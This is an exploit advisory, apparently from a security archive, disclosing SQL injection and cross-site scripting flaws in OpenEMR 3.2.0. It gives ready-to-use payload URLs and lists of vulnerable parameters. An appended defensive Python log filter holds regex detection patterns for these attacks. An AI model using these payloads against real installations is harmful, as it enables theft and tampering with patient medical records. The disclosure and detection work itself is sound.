
OpenEMR 3.2.0 SQL Injection / Cross Site Scripting
Posted Dec 27, 2010
Authored by Blake

OpenEMR version 3.2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 9ca836e02286319ce83ae42b646fda3eb4771e29dac9f5fdfbd9b81bc55b9b34

# Exploit Title: OpenEMR v3.2.0 Multiple Vulnerabilities
# Date: December 26, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/openemr/
# Version: 3.2.0
# Tested on: Windows XP SP3


Description:
Open Source Practice Management, Electronic Medical Record, Prescription Writing and Medical Billing application.


SQL Injection:

The issue parameter is vulnerable to SQL injection:

http://192.168.1.127/openemr/interface/patient_file/summary/add_edit_issue.php?issue=0+union+select+null,null,null,@@version,system_user(),database(),user(),null,null,null,null,null,null,null,null,null,null,null,null--

Additional vulnerable parameters:
/openemr/controller.php [prescription&list&id parameter]
/openemr/controller.php [prescription&multiprintcss&id parameter]
/openemr/interface/main/calendar/index.php [pc_facility parameter]
/openemr/interface/patient_file/summary/add_edit_issue.php [issue parameter]
/openemr/interface/patient_file/summary/demographics.php [set_pid parameter]
/openemr/interface/patient_file/summary/immunizations.php [administered_by_id parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [assigned_to parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [form_note_type parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [noteid parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [offset parameter]


Stored XSS:
The note parameter is vulnerable to stored XSS:

http://192.168.1.127/openemr/interface/patient_file/summary/immunizations.php?mode=add&id=&pid=98&form_immunization_id=6&administered_date=2010-12-26&manufacturer=&lot_number=&administered_by=Administrator%2C+&administered_by_id=1&education_date=2010-12-26&vis_date=2010-12-26&note=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E

Additional vulnerable parameters:
/openemr/interface/logview/logview.php [rumple parameter]
/openemr/interface/patient_file/report/patient_report.php [form_title parameter]
/openemr/interface/patient_file/summary/immunizations.php [manufacturer parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [assigned_to parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [rumple parameter]
/openemr/interface/usergroup/usergroup_admin.php [rumple parameter]

Reflected XSS:
The parent_id parameter is vulnerable to reflected XSS:

http://192.168.1.127/openemr/controller.php?document&upload&patient_id=2&parent_id=%22%3E%3Cscript%3Ealert%2810%29%3C/script%3E

Additional vulnerable parameters:
/openemr/controller.php [document&list&patient_id parameter]
/openemr/controller.php [document&upload&patient_id parameter]
/openemr/controller.php [document&upload&patient_id parameter]
/openemr/controller.php [parent_id parameter]
/openemr/controller.php [prescription&list&id parameter]
/openemr/interface/forms/newpatient/save.php [facility_id parameter]
/openemr/interface/forms/newpatient/save.php [form_date parameter]
/openemr/interface/forms/newpatient/save.php [form_date parameter]
/openemr/interface/forms/newpatient/save.php [form_onset_date parameter]
/openemr/interface/forms/newpatient/save.php [form_sensitivity parameter]
/openemr/interface/forms/newpatient/save.php [mode parameter]
/openemr/interface/forms/newpatient/save.php [pc_catid parameter]
/openemr/interface/forms/newpatient/save.php [reason parameter]
/openemr/interface/language/language.php [edit parameter]
/openemr/interface/language/language.php [m parameter]
/openemr/interface/main/calendar/index.php [&pc_username[] parameter]
/openemr/interface/main/calendar/index.php [pc_category parameter]
/openemr/interface/main/calendar/index.php [pc_topic parameter]
/openemr/interface/main/calendar/index.php [tplview parameter]
/openemr/interface/patient_file/deleter.php [billing parameter]
/openemr/interface/patient_file/summary/add_edit_issue.php [issue parameter]
/openemr/interface/patient_file/summary/demographics.php [set_pid parameter]
/openemr/interface/patient_file/summary/immunizations.php [administered_by_id parameter]
/openemr/interface/patient_file/summary/immunizations.php [lot_number parameter]
/openemr/interface/patient_file/summary/immunizations.php [manufacturer parameter]
/openemr/interface/patient_file/summary/immunizations.php [note parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [assigned_to parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [form_active parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [form_inactive parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [noteid parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [set_pid parameter]
/openemr/interface/usergroup/usergroup_admin.php [groupname parameter]
/openemr/interface/usergroup/usergroup_admin.php [rumple parameter]
/openemr/interface/patient_file/summary/add_edit_issue.php [form_title parameter]
/openemr/interface/patient_file/summary/pnotes_full.php [note parameter]
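
For defenders triaging web-server logs of an affected install, the script and parameter lists above can drive a simple log filter. The Python below is an added example, not part of the original advisory: the Combined Log Format, the indicator regexes, the subset of watched parameters and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path -> parameters to watch; a subset of the advisory's lists.
WATCHED = {
    "/openemr/interface/patient_file/summary/add_edit_issue.php": {"issue", "form_title"},
    "/openemr/interface/patient_file/summary/immunizations.php": {
        "administered_by_id", "manufacturer", "lot_number", "note"},
    "/openemr/interface/patient_file/summary/pnotes_full.php": {
        "assigned_to", "form_note_type", "noteid", "offset", "note", "set_pid"},
    "/openemr/controller.php": {"id", "patient_id", "parent_id"},
}
# Heuristic indicators (assumptions of this example, tune before relying on them).
INDICATORS = {
    "sqli": re.compile(r"\bunion\b.+\bselect\b|@@\w+|--\s*$", re.I | re.S),
    "xss": re.compile(r"<\s*/?\s*script\b|\bon\w+\s*=|javascript:", re.I),
}
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (path, parameter, kind) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    watched = WATCHED.get(url.path, set())
    findings = []
    # parse_qsl percent-decodes names and values and turns '+' into a space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in watched:
            findings += [(url.path, name, kind)
                         for kind, rx in INDICATORS.items() if rx.search(value)]
    return findings

# Constructed sample lines (client addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Dec/2010:10:00:01 +0000] "GET /openemr/interface/patient_file/summary/add_edit_issue.php?issue=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Dec/2010:10:02:17 +0000] "GET /openemr/interface/patient_file/summary/add_edit_issue.php?issue=0+union+select+null,@@version-- HTTP/1.1" 200 5301',
    '192.0.2.44 - - [26/Dec/2010:10:03:40 +0000] "GET /openemr/interface/patient_file/summary/immunizations.php?mode=add&pid=98&note=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E HTTP/1.1" 200 4410',
    '192.0.2.44 - - [26/Dec/2010:10:04:02 +0000] "GET /openemr/controller.php?document&upload&patient_id=2&parent_id=%22%3E%3Cscript%3Ealert%2810%29%3C/script%3E HTTP/1.1" 200 3988',
    '192.0.2.10 - - [26/Dec/2010:10:05:30 +0000] "GET /openemr/interface/patient_file/summary/immunizations.php?mode=add&pid=98&note=Patient+tolerated+dose+well HTTP/1.1" 200 4388',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for finding in scan_line(entry):
            print(finding)
```

Access logs record only the query string, so parameters submitted in POST bodies are not visible to this filter and need request-body logging or a WAF audit log instead.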
